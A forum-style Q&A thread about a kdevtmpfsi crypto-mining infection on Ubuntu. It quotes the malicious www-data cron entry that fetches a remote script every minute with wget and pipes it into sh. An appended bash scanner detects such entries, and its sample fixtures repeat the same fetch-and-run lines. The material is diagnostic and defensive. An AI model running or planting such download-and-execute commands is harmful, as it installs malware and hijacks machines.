Score:0

kdevtmpfsi using the entire CPU


I noticed the CPU on Ubuntu is 100% used by a process named kdevtmpfsi.

Anyone know what this is? Is it malware?

In /var/spool/cron/crontabs/www-data I came across the following cron job:

```
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Feb  1 05:30:10 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
```

Is this legitimate or again malware?

Doug Smythies
Yes, that looks bad. The IP address is in Russia, Moscow, and it is executing a script. I suggest downloading the script manually and looking at what it is doing. Also check all of your logs in `/var/log` for how this happened at 2023.02.01 05:30:10.
adam78
@DougSmythies which log file would I be looking at? Sorry, I'm still a newbie on server management.
Doug Smythies
All of them. Also look [here](https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu). You seem to have crypto mining malware.
This cron script definitely isn't part of the operating system. Good job spotting it. No serious package would use a script like this. It says every 1 minute, download this file and run it.
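
A way to check a host for entries of this kind, as an added example that is not part of the original thread: a bash function that scans crontab directories for active entries that download with wget or curl and pipe the result into a shell. It generalises the `wget ... | sh` entry from the question to curl and other shells; the function names, sample files and the documentation address 203.0.113.10 are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the thread): find crontab entries that fetch a
# script with wget/curl and pipe it straight into a shell.

# A fetch tool, then a pipe into sh/bash/dash/zsh/ksh on the same line.
FETCH_PIPE_RE='(^|[^[:alnum:]_])(wget|curl)[[:space:]][^#]*\|[[:space:]]*(ba|da|z|k)?sh([[:space:];>]|$)'

# scan_crontabs DIR...: print "file:line:entry" for every active (uncommented)
# entry that matches. Files the caller cannot read are skipped silently, so
# the per-user spool directory needs root.
scan_crontabs() {
    local dir
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        grep -rHnE -- "$FETCH_PIPE_RE" "$dir" 2>/dev/null \
            | grep -vE '^[^:]+:[0-9]+:[[:space:]]*#' || true
    done
}

# make_sample DIR: write constructed crontabs (203.0.113.10 is a
# documentation address, not the one from the post).
make_sample() {
    mkdir -p "$1"
    cat > "$1/www-data" <<'EOF'
# DO NOT EDIT THIS FILE - edit the master and reinstall.
* * * * * wget -q -O - http://203.0.113.10/unk.sh | sh > /dev/null 2>&1
EOF
    cat > "$1/backup" <<'EOF'
# old entry: curl -s http://203.0.113.10/a.sh | bash
15 3 * * * /usr/local/bin/backup.sh | logger -t backup
30 4 * * * wget -q -O /tmp/report.csv http://203.0.113.10/report.csv
EOF
}

# Demo on the constructed sample; on a real host pass the spool directories,
# e.g. scan_crontabs /var/spool/cron/crontabs /etc/cron.d
sample=$(mktemp -d)
make_sample "$sample"
scan_crontabs "$sample"
rm -rf "$sample"
```

Only the `www-data` entry is reported: the commented-out line, the pipe into `logger` and the plain download to a file are left alone.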